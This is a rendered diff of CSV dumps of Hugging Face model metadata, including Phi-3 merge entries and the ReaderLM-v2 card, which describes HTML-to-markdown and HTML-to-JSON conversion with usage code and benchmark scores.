| 513 |
+
|
| 514 |
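# Sampling (do_sample=True with temperature/top_k/top_p) trades determinism for variety.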
+
outputs = model.generate(tokenized_input, max_new_tokens=128, do_sample=True, temperature=0.7, top_k=50, top_p=0.95)
|
| 515 |
+
print(tokenizer.decode(outputs[0]))
|
| 516 |
+
```","{""id"": ""DarqueDante/Phi3Mix"", ""author"": ""DarqueDante"", ""sha"": ""ae6d7223ff73a688b9359e9ac5a01436cc84fb30"", ""last_modified"": ""2024-05-25 09:26:36+00:00"", ""created_at"": ""2024-05-25 09:11:00+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 0, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""safetensors"", ""phi3"", ""text-generation"", ""moe"", ""merge"", ""mergekit"", ""lazymergekit"", ""phi3_mergekit"", ""microsoft/Phi-3-medium-128k-instruct"", ""conversational"", ""custom_code"", ""base_model:microsoft/Phi-3-medium-128k-instruct"", ""base_model:finetune:microsoft/Phi-3-medium-128k-instruct"", ""license:apache-2.0"", ""autotrain_compatible"", ""text-generation-inference"", ""endpoints_compatible"", ""region:us""], ""pipeline_tag"": ""text-generation"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model:\n- microsoft/Phi-3-medium-128k-instruct\n- microsoft/Phi-3-medium-128k-instruct\nlicense: apache-2.0\ntags:\n- moe\n- merge\n- mergekit\n- lazymergekit\n- phi3_mergekit\n- microsoft/Phi-3-medium-128k-instruct"", ""widget_data"": [{""text"": ""Hi, what can you help me with?""}, {""text"": ""What is 84 * 3 / 2?""}, {""text"": ""Tell me an interesting fact about the universe!""}, {""text"": ""Explain quantum computing in simple terms.""}], ""model_index"": null, ""config"": {""architectures"": [""Phi3ForCausalLM""], ""auto_map"": {""AutoConfig"": ""configuration_phi3.Phi3Config"", ""AutoModelForCausalLM"": ""modeling_phi3.Phi3ForCausalLM""}, ""model_type"": ""phi3"", ""tokenizer_config"": {""bos_token"": ""<s>"", ""chat_template"": ""{% for message in messages %}{% if (message['role'] == 'user') %}{{'<|user|>' + '\n' + message['content'] + '<|end|>' + '\n' + '<|assistant|>' + '\n'}}{% elif (message['role'] == 'assistant') %}{{message['content'] + '<|end|>' + '\n'}}{% endif %}{% endfor %}"", ""eos_token"": ""<|endoftext|>"", ""pad_token"": ""<s>"", ""unk_token"": ""<unk>"", ""use_default_system_prompt"": false}}, ""transformers_info"": {""auto_model"": ""AutoModelForCausalLM"", ""custom_class"": null, ""pipeline_tag"": ""text-generation"", ""processor"": ""AutoTokenizer""}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='added_tokens.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='configuration_phi3.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='mergekit_moe_config.yml', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00001-of-00028.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00002-of-00028.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00003-of-00028.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00004-of-00028.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00005-of-00028.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00006-of-00028.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00007-of-00028.safetensors', size=None, blob_id=None, lfs=None)"", 
""RepoSibling(rfilename='model-00008-of-00028.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00009-of-00028.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00010-of-00028.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00011-of-00028.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00012-of-00028.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00013-of-00028.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00014-of-00028.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00015-of-00028.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00016-of-00028.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00017-of-00028.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00018-of-00028.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00019-of-00028.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00020-of-00028.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00021-of-00028.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00022-of-00028.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00023-of-00028.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00024-of-00028.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00025-of-00028.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00026-of-00028.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00027-of-00028.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00028-of-00028.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors.index.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='modeling_phi3.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.model', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": {""parameters"": {""F16"": 24970695680}, ""total"": 24970695680}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-05-25 09:26:36+00:00"", ""cardData"": ""base_model:\n- microsoft/Phi-3-medium-128k-instruct\n- microsoft/Phi-3-medium-128k-instruct\nlicense: apache-2.0\ntags:\n- moe\n- merge\n- mergekit\n- lazymergekit\n- phi3_mergekit\n- microsoft/Phi-3-medium-128k-instruct"", ""transformersInfo"": {""auto_model"": ""AutoModelForCausalLM"", ""custom_class"": null, ""pipeline_tag"": ""text-generation"", ""processor"": ""AutoTokenizer""}, ""_id"": ""6651ab245ff9a886712d7387"", ""modelId"": ""DarqueDante/Phi3Mix"", ""usedStorage"": 
49941933211}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=DarqueDante/Phi3Mix&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5BDarqueDante%2FPhi3Mix%5D(%2FDarqueDante%2FPhi3Mix)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
|
| 517 |
+
dankalin/phi3-medium-instruct,"---
|
| 518 |
+
library_name: transformers
|
| 519 |
+
language:
|
| 520 |
+
- ru
|
| 521 |
+
base_model: microsoft/Phi-3-medium-128k-instruct
|
| 522 |
+
---
|
| 523 |
+
","{""id"": ""dankalin/phi3-medium-instruct"", ""author"": ""dankalin"", ""sha"": ""11fdb76c610205d9f9befec15b7f458582da8fc3"", ""last_modified"": ""2024-09-03 00:49:43+00:00"", ""created_at"": ""2024-07-15 16:36:08+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 0, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""safetensors"", ""phi3"", ""text-generation"", ""conversational"", ""custom_code"", ""ru"", ""base_model:microsoft/Phi-3-medium-128k-instruct"", ""base_model:finetune:microsoft/Phi-3-medium-128k-instruct"", ""autotrain_compatible"", ""text-generation-inference"", ""endpoints_compatible"", ""region:us""], ""pipeline_tag"": ""text-generation"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model: microsoft/Phi-3-medium-128k-instruct\nlanguage:\n- ru\nlibrary_name: transformers"", ""widget_data"": null, ""model_index"": null, ""config"": {""architectures"": [""Phi3ForCausalLM""], ""auto_map"": {""AutoConfig"": ""configuration_phi3.Phi3Config"", ""AutoModelForCausalLM"": ""modeling_phi3.Phi3ForCausalLM""}, ""model_type"": ""phi3"", ""tokenizer_config"": {""bos_token"": ""<s>"", ""chat_template"": ""{% if messages[0]['role'] == 'system' %} {% set offset = 1 %} {% else %} {% set offset = 0 %} {% endif %}{{ bos_token }}{% for message in messages %}{% if (message['role'] == 'user') != (loop.index0 % 2 == offset) %}{{ raise_exception('Conversation roles must alternate user/assistant/user/assistant/...') }}{% endif %}{{ '<|' + message['role'] + '|>\n' + message['content'] | trim + '<|end|>' + '\n' }}{% endfor %}{% if add_generation_prompt %}{{ '<|assistant|>\n' }}{% endif %}"", ""eos_token"": ""<|endoftext|>"", ""pad_token"": ""<|endoftext|>"", ""unk_token"": ""<unk>"", ""use_default_system_prompt"": false}}, ""transformers_info"": {""auto_model"": ""AutoModelForCausalLM"", ""custom_class"": null, ""pipeline_tag"": ""text-generation"", ""processor"": ""AutoTokenizer""}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='added_tokens.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='configuration_phi3.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='generation_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00001-of-00006.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00002-of-00006.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00003-of-00006.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00004-of-00006.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00005-of-00006.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00006-of-00006.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors.index.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='modeling_phi3.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.model', size=None, blob_id=None, lfs=None)"", 
""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": {""parameters"": {""F16"": 13959695360}, ""total"": 13959695360}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-09-03 00:49:43+00:00"", ""cardData"": ""base_model: microsoft/Phi-3-medium-128k-instruct\nlanguage:\n- ru\nlibrary_name: transformers"", ""transformersInfo"": {""auto_model"": ""AutoModelForCausalLM"", ""custom_class"": null, ""pipeline_tag"": ""text-generation"", ""processor"": ""AutoTokenizer""}, ""_id"": ""66954ff85e5e72a434cd5cde"", ""modelId"": ""dankalin/phi3-medium-instruct"", ""usedStorage"": 27919918755}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=dankalin/phi3-medium-instruct&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bdankalin%2Fphi3-medium-instruct%5D(%2Fdankalin%2Fphi3-medium-instruct)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
|
QwQ-32B-Preview_finetunes_20250424_193500.csv_finetunes_20250424_193500.csv
ADDED
|
The diff for this file is too large to render.
|
|
|
Qwen2-72B_finetunes_20250426_215237.csv_finetunes_20250426_215237.csv
ADDED
|
The diff for this file is too large to render.
|
|
|
Qwen2-7B-Instruct_finetunes_20250425_165642.csv_finetunes_20250425_165642.csv
ADDED
|
The diff for this file is too large to render.
|
|
|
ReaderLM-v2_finetunes_20250425_165642.csv_finetunes_20250425_165642.csv
ADDED
|
@@ -0,0 +1,305 @@
|
| 1 |
+
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
|
| 2 |
+
jinaai/ReaderLM-v2,"---
|
| 3 |
+
pipeline_tag: text-generation
|
| 4 |
+
language:
|
| 5 |
+
- multilingual
|
| 6 |
+
inference: false
|
| 7 |
+
license: cc-by-nc-4.0
|
| 8 |
+
library_name: transformers
|
| 9 |
+
---
|
| 10 |
+
|
| 11 |
+
<br><br>
|
| 12 |
+
|
| 13 |
+
<p align=""center"">
|
| 14 |
+
<img src=""https://huggingface.co/datasets/jinaai/documentation-images/resolve/main/logo.webp"" alt=""Jina AI: Your Search Foundation, Supercharged!"" width=""150px"">
|
| 15 |
+
</p>
|
| 16 |
+
|
| 17 |
+
<p align=""center"">
|
| 18 |
+
<b>Trained by <a href=""https://jina.ai/""><b>Jina AI</b></a>.</b>
|
| 19 |
+
</p>
|
| 20 |
+
|
| 21 |
+
[Blog](https://jina.ai/news/readerlm-v2-frontier-small-language-model-for-html-to-markdown-and-json) | [API](https://jina.ai/reader) | [Colab](https://colab.research.google.com/drive/1FfPjZwkMSocOLsEYH45B3B4NxDryKLGI?usp=sharing) | [AWS](https://aws.amazon.com/marketplace/pp/prodview-jwfct4j4rvxk2?sr=0-21&ref_=beagle&applicationId=AWSMPContessa) | [Azure](https://azuremarketplace.microsoft.com/en-us/marketplace/apps/jinaai.reader-lm-v2-vm)| [Arxiv](https://arxiv.org/abs/2503.01151)
|
| 22 |
+
|
| 23 |
+
# ReaderLM-v2
|
| 24 |
+
|
| 25 |
+
`ReaderLM-v2` is a 1.5B parameter language model that converts raw HTML into beautifully formatted markdown or JSON with superior accuracy and improved longer context handling. Supporting multiple languages (29 in total), `ReaderLM-v2` is specialized for tasks involving HTML parsing, transformation, and text extraction.
|
| 26 |
+
|
| 27 |
+
## What's New in `ReaderLM-v2`
|
| 28 |
+
|
| 29 |
+
`ReaderLM-v2` represents a significant leap forward from its predecessor, with several key improvements:
|
| 30 |
+
|
| 31 |
+
- **Better Markdown Generation**: Thanks to its new training paradigm and higher-quality training data, the model excels at generating complex elements like code fences, nested lists, tables, and LaTeX equations.
|
| 32 |
+
- **JSON Output**: Introduces direct HTML-to-JSON generation using predefined schemas, eliminating the need for intermediate markdown conversion.
|
| 33 |
+
- **Longer Context Handling**: Handles up to 512K tokens combined input and output length, with improved performance on long-form content.
|
| 34 |
+
- **Multilingual Support**: Comprehensive support across 29 languages for broader applications.
|
| 35 |
+
- **Enhanced Stability**: Greatly alleviates degeneration issues after generating long sequences through contrastive loss during training.
|
| 36 |
+
|
| 37 |
+
## Model Overview
|
| 38 |
+
|
| 39 |
+
- **Model Type**: Autoregressive, decoder-only transformer
|
| 40 |
+
- **Parameter Count**: 1.54B
|
| 41 |
+
- **Context Window**: Up to 512K tokens (combined input and output)
|
| 42 |
+
- **Hidden Size**: 1536
|
| 43 |
+
- **Number of Layers**: 28
|
| 44 |
+
- **Query Heads**: 12
|
| 45 |
+
- **KV Heads**: 2
|
| 46 |
+
- **Head Size**: 128
|
| 47 |
+
- **Intermediate Size**: 8960
|
| 48 |
+
- **Supported Languages**: English, Chinese, Japanese, Korean, French, Spanish, Portuguese, German, Italian, Russian, Vietnamese, Thai, Arabic, and more (29 total)
|
| 49 |
+
|
| 50 |
+
---
|
| 51 |
+
|
| 52 |
+
# Usage
|
| 53 |
+
|
| 54 |
+
Below, you will find instructions and examples for using `ReaderLM-v2` locally using the Hugging Face Transformers library.
|
| 55 |
+
For a more hands-on experience in a hosted environment, see the [Google Colab Notebook](https://colab.research.google.com/drive/1FfPjZwkMSocOLsEYH45B3B4NxDryKLGI?usp=sharing).
|
| 56 |
+
|
| 57 |
+
## Via Reader API
|
| 58 |
+
|
| 59 |
+
`ReaderLM-v2` is now fully integrated with [Reader API](https://jina.ai/reader/). To use it, simply specify `x-engine: readerlm-v2` in your request headers and enable response streaming with `-H 'Accept: text/event-stream'`:
|
| 60 |
+
|
| 61 |
+
```bash
|
| 62 |
+
curl https://r.jina.ai/https://news.ycombinator.com/ -H 'x-engine: readerlm-v2' -H 'Accept: text/event-stream'
|
| 63 |
+
```
|
| 64 |
+
|
| 65 |
+
You can try it without an API key at a lower rate limit. For higher rate limits, you can purchase an API key. Please note that ReaderLM-v2 requests consume 3x the normal token count from your API key allocation. This is currently an experimental feature, and we're working with the GCP team to improve GPU efficiency.
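The same streaming request can be made from Python. This is a minimal sketch assuming only the endpoint and headers from the curl command above; the `requests` library and the commented-out `Authorization` header are illustrative, not part of any official client:

```python
import requests

# Stream a page through the Reader API, selecting ReaderLM-v2
# via the x-engine header as in the curl example above.
url = 'https://r.jina.ai/https://news.ycombinator.com/'
headers = {
    'x-engine': 'readerlm-v2',
    'Accept': 'text/event-stream',
    # 'Authorization': 'Bearer <your-api-key>',  # optional; raises the rate limit
}

with requests.get(url, headers=headers, stream=True) as resp:
    resp.raise_for_status()
    for line in resp.iter_lines(decode_unicode=True):
        if line:  # skip blank keep-alive lines between SSE events
            print(line)
```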
|
| 66 |
+
|
| 67 |
+
## On Google Colab
|
| 68 |
+
|
| 69 |
+
You can try `ReaderLM-v2` via our [Colab notebook](https://colab.research.google.com/drive/1FfPjZwkMSocOLsEYH45B3B4NxDryKLGI?usp=sharing), which demonstrates HTML-to-markdown conversion, JSON extraction, and instruction-following using the HackerNews frontpage as an example. The notebook is optimized for Colab's free T4 GPU tier and requires `vllm` and `triton` for acceleration.
|
| 70 |
+
|
| 71 |
+
Note that the free T4 GPU has limitations—it doesn't support bfloat16 or flash attention 2, leading to higher memory usage and slower processing of longer inputs. Nevertheless, ReaderLM-v2 successfully processes large documents under these constraints, achieving processing speeds of 67 tokens/s input and 36 tokens/s output. For production use, we recommend an RTX 3090/4090 for optimal performance.
|
| 72 |
+
|
| 73 |
+
## Local Usage
|
| 74 |
+
|
| 75 |
+
To use `ReaderLM-v2` locally:
|
| 76 |
+
|
| 77 |
+
1. Install the necessary dependencies:
|
| 78 |
+
|
| 79 |
+
```bash
|
| 80 |
+
pip install transformers
|
| 81 |
+
```
|
| 82 |
+
|
| 83 |
+
2. Load and run the model:
|
| 84 |
+
|
| 85 |
+
```python
|
| 86 |
+
from transformers import AutoModelForCausalLM, AutoTokenizer
|
| 87 |
+
|
| 88 |
+
device = ""cuda"" # or ""cpu""
|
| 89 |
+
tokenizer = AutoTokenizer.from_pretrained(""jinaai/ReaderLM-v2"")
|
| 90 |
+
model = AutoModelForCausalLM.from_pretrained(""jinaai/ReaderLM-v2"").to(device)
|
| 91 |
+
```
|
| 92 |
+
|
| 93 |
+
3. (Optional) Pre-clean your HTML to strip scripts, styles, meta tags, comments, and links, reducing the noise and length of the input:
|
| 94 |
+
|
| 95 |
+
```python
|
| 96 |
+
import re
|
| 97 |
+
|
| 98 |
+
# Patterns
|
| 99 |
+
SCRIPT_PATTERN = r""<[ ]*script.*?\/[ ]*script[ ]*>""
|
| 100 |
+
STYLE_PATTERN = r""<[ ]*style.*?\/[ ]*style[ ]*>""
|
| 101 |
+
META_PATTERN = r""<[ ]*meta.*?>""
|
| 102 |
+
COMMENT_PATTERN = r""<[ ]*!--.*?--[ ]*>""
|
| 103 |
+
LINK_PATTERN = r""<[ ]*link.*?>""
|
| 104 |
+
BASE64_IMG_PATTERN = r'<img[^>]+src=""data:image/[^;]+;base64,[^""]+""[^>]*>'
|
| 105 |
+
SVG_PATTERN = r""(<svg[^>]*>)(.*?)(<\/svg>)""
|
| 106 |
+
|
| 107 |
+
|
| 108 |
+
def replace_svg(html: str, new_content: str = ""this is a placeholder"") -> str:
|
| 109 |
+
return re.sub(
|
| 110 |
+
SVG_PATTERN,
|
| 111 |
+
lambda match: f""{match.group(1)}{new_content}{match.group(3)}"",
|
| 112 |
+
html,
|
| 113 |
+
flags=re.DOTALL,
|
| 114 |
+
)
|
| 115 |
+
|
| 116 |
+
|
| 117 |
+
def replace_base64_images(html: str, new_image_src: str = ""#"") -> str:
|
| 118 |
+
return re.sub(BASE64_IMG_PATTERN, f'<img src=""{new_image_src}""/>', html)
|
| 119 |
+
|
| 120 |
+
|
| 121 |
+
def clean_html(html: str, clean_svg: bool = False, clean_base64: bool = False):
|
| 122 |
+
html = re.sub(
|
| 123 |
+
SCRIPT_PATTERN, """", html, flags=re.IGNORECASE | re.MULTILINE | re.DOTALL
|
| 124 |
+
)
|
| 125 |
+
html = re.sub(
|
| 126 |
+
STYLE_PATTERN, """", html, flags=re.IGNORECASE | re.MULTILINE | re.DOTALL
|
| 127 |
+
)
|
| 128 |
+
html = re.sub(
|
| 129 |
+
META_PATTERN, """", html, flags=re.IGNORECASE | re.MULTILINE | re.DOTALL
|
| 130 |
+
)
|
| 131 |
+
html = re.sub(
|
| 132 |
+
COMMENT_PATTERN, """", html, flags=re.IGNORECASE | re.MULTILINE | re.DOTALL
|
| 133 |
+
)
|
| 134 |
+
html = re.sub(
|
| 135 |
+
LINK_PATTERN, """", html, flags=re.IGNORECASE | re.MULTILINE | re.DOTALL
|
| 136 |
+
)
|
| 137 |
+
|
| 138 |
+
if clean_svg:
|
| 139 |
+
html = replace_svg(html)
|
| 140 |
+
if clean_base64:
|
| 141 |
+
html = replace_base64_images(html)
|
| 142 |
+
return html
|
| 143 |
+
```
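A quick usage sketch of the helper defined above (the input file name is hypothetical):

```python
with open('page.html', encoding='utf-8') as f:  # hypothetical input file
    raw_html = f.read()

html = clean_html(raw_html, clean_svg=True, clean_base64=True)
```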
|
| 144 |
+
|
| 145 |
+
4. Create a prompt for the model:
|
| 146 |
+
|
| 147 |
+
```python
|
| 148 |
+
def create_prompt(
|
| 149 |
+
text: str, tokenizer=None, instruction: str = None, schema: str = None
|
| 150 |
+
) -> str:
|
| 151 |
+
""""""
|
| 152 |
+
Create a prompt for the model with optional instruction and JSON schema.
|
| 153 |
+
""""""
|
| 154 |
+
if not instruction:
|
| 155 |
+
instruction = ""Extract the main content from the given HTML and convert it to Markdown format.""
|
| 156 |
+
if schema:
|
| 157 |
+
instruction = ""Extract the specified information from a list of news threads and present it in a structured JSON format.""
|
| 158 |
+
prompt = f""{instruction}\n```html\n{text}\n```\nThe JSON schema is as follows:```json\n{schema}\n```""
|
| 159 |
+
else:
|
| 160 |
+
prompt = f""{instruction}\n```html\n{text}\n```""
|
| 161 |
+
|
| 162 |
+
messages = [
|
| 163 |
+
{
|
| 164 |
+
""role"": ""user"",
|
| 165 |
+
""content"": prompt,
|
| 166 |
+
}
|
| 167 |
+
]
|
| 168 |
+
|
| 169 |
+
return tokenizer.apply_chat_template(
|
| 170 |
+
messages, tokenize=False, add_generation_prompt=True
|
| 171 |
+
)
|
| 172 |
+
```
|
| 173 |
+
|
| 174 |
+
### HTML to Markdown Example
|
| 175 |
+
|
| 176 |
+
```python
|
| 177 |
+
html = ""<html><body><h1>Hello, world!</h1></body></html>""
|
| 178 |
+
|
| 179 |
+
html = clean_html(html)
|
| 180 |
+
|
| 181 |
+
input_prompt = create_prompt(html, tokenizer=tokenizer)
|
| 182 |
+
inputs = tokenizer.encode(input_prompt, return_tensors=""pt"").to(device)
|
| 183 |
+
outputs = model.generate(
|
| 184 |
+
inputs, max_new_tokens=1024, temperature=0, do_sample=False, repetition_penalty=1.08
|
| 185 |
+
)
|
| 186 |
+
|
| 187 |
+
print(tokenizer.decode(outputs[0]))
|
| 188 |
+
```
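The decoded output above includes the prompt and chat-template tokens. As an optional refinement (standard `transformers` tensor slicing, not specific to this model), you can decode only the newly generated tokens:

```python
# Slice off the prompt so only the model's answer is decoded.
generated = outputs[0][inputs.shape[1]:]
print(tokenizer.decode(generated, skip_special_tokens=True))
```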
|
| 189 |
+
|
| 190 |
+
### HTML to JSON Example
|
| 191 |
+
|
| 192 |
+
```python
|
| 193 |
+
schema = """"""
|
| 194 |
+
{
|
| 195 |
+
""type"": ""object"",
|
| 196 |
+
""properties"": {
|
| 197 |
+
""title"": {
|
| 198 |
+
""type"": ""string""
|
| 199 |
+
},
|
| 200 |
+
""author"": {
|
| 201 |
+
""type"": ""string""
|
| 202 |
+
},
|
| 203 |
+
""date"": {
|
| 204 |
+
""type"": ""string""
|
| 205 |
+
},
|
| 206 |
+
""content"": {
|
| 207 |
+
""type"": ""string""
|
| 208 |
+
}
|
| 209 |
+
},
|
| 210 |
+
""required"": [""title"", ""author"", ""date"", ""content""]
|
| 211 |
+
}
|
| 212 |
+
""""""
|
| 213 |
+
|
| 214 |
+
html = clean_html(html)
|
| 215 |
+
input_prompt = create_prompt(html, tokenizer=tokenizer, schema=schema)
|
| 216 |
+
|
| 217 |
+
inputs = tokenizer.encode(input_prompt, return_tensors=""pt"").to(device)
|
| 218 |
+
outputs = model.generate(
|
| 219 |
+
inputs, max_new_tokens=1024, temperature=0, do_sample=False, repetition_penalty=1.08
|
| 220 |
+
)
|
| 221 |
+
|
| 222 |
+
print(tokenizer.decode(outputs[0]))
|
| 223 |
+
```
|
| 224 |
+
|
| 225 |
+
## Model Performance
|
| 226 |
+
|
| 227 |
+
ReaderLM-v2 has been extensively evaluated on various tasks:
|
| 228 |
+
|
| 229 |
+
### Quantitative Evaluation
|
| 230 |
+
|
| 231 |
+
For HTML-to-Markdown tasks, the model outperforms much larger models like Qwen2.5-32B-Instruct and Gemini2-flash-expr, achieving:
|
| 232 |
+
- ROUGE-L: 0.84
|
| 233 |
+
- Levenshtein Distance: 0.22
|
| 234 |
+
- Jaro-Winkler Similarity: 0.82
|
| 235 |
+
|
| 236 |
+
For HTML-to-JSON tasks, it shows competitive performance with:
|
| 237 |
+
- F1 Score: 0.81
|
| 238 |
+
- Precision: 0.82
|
| 239 |
+
- Recall: 0.81
|
| 240 |
+
- Pass-Rate: 0.98
|
| 241 |
+
|
| 242 |
+
### Qualitative Evaluation
|
| 243 |
+
|
| 244 |
+
The model excels in three key dimensions:
|
| 245 |
+
- Content Integrity: 39/50
|
| 246 |
+
- Structural Accuracy: 35/50
|
| 247 |
+
- Format Compliance: 36/50
|
| 248 |
+
|
| 249 |
+
These scores demonstrate strong performance in preserving semantic information, maintaining structural accuracy, and adhering to markdown syntax standards.
|
| 250 |
+
|
| 251 |
+
## Training Details
|
| 252 |
+
|
| 253 |
+
ReaderLM-v2 is built on Qwen2.5-1.5B-Instruct and trained using a sophisticated pipeline:
|
| 254 |
+
|
| 255 |
+
1. Data Preparation: Created html-markdown-1m dataset with 1 million HTML documents
|
| 256 |
+
2. Synthetic Data Generation: Three-step pipeline using Qwen2.5-32B-Instruct
|
| 257 |
+
- Drafting: Initial markdown and JSON generation
|
| 258 |
+
- Refinement: Content cleanup and structure alignment
|
| 259 |
+
- Critique: Quality evaluation and filtering
|
| 260 |
+
|
| 261 |
+
3. Training Process:
|
| 262 |
+
- Long-context pretraining
|
| 263 |
+
- Supervised fine-tuning
|
| 264 |
+
- Direct preference optimization
|
| 265 |
+
- Self-play reinforcement tuning","{""id"": ""jinaai/ReaderLM-v2"", ""author"": ""jinaai"", ""sha"": ""1d07078459ee1e880a22d67387b5e683d50a6e4b"", ""last_modified"": ""2025-03-04 06:52:36+00:00"", ""created_at"": ""2025-01-13 02:44:23+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 69284, ""downloads_all_time"": null, ""likes"": 615, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""onnx"", ""safetensors"", ""qwen2"", ""text-generation"", ""conversational"", ""multilingual"", ""arxiv:2503.01151"", ""license:cc-by-nc-4.0"", ""autotrain_compatible"", ""text-generation-inference"", ""region:eu""], ""pipeline_tag"": ""text-generation"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""language:\n- multilingual\nlibrary_name: transformers\nlicense: cc-by-nc-4.0\npipeline_tag: text-generation\ninference: false"", ""widget_data"": null, ""model_index"": null, ""config"": {""architectures"": [""Qwen2ForCausalLM""], ""model_type"": ""qwen2"", ""tokenizer_config"": {""bos_token"": null, ""chat_template"": ""{% for message in messages %}{% if loop.first and messages[0]['role'] != 'system' %}{{ '<|im_start|>system\nYou are an AI assistant developed by Jina AI.<|im_end|>\n' }}{% endif %}{{'<|im_start|>' + message['role'] + '\n' + message['content'] + '<|im_end|>' + '\n' }}{% endfor %}{% if add_generation_prompt %}{{ '<|im_start|>assistant\n' }}{% endif %}"", ""eos_token"": ""<|im_end|>"", ""pad_token"": ""<|endoftext|>"", ""unk_token"": null}}, ""transformers_info"": {""auto_model"": ""AutoModelForCausalLM"", ""custom_class"": null, ""pipeline_tag"": ""text-generation"", ""processor"": ""AutoTokenizer""}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='added_tokens.json', 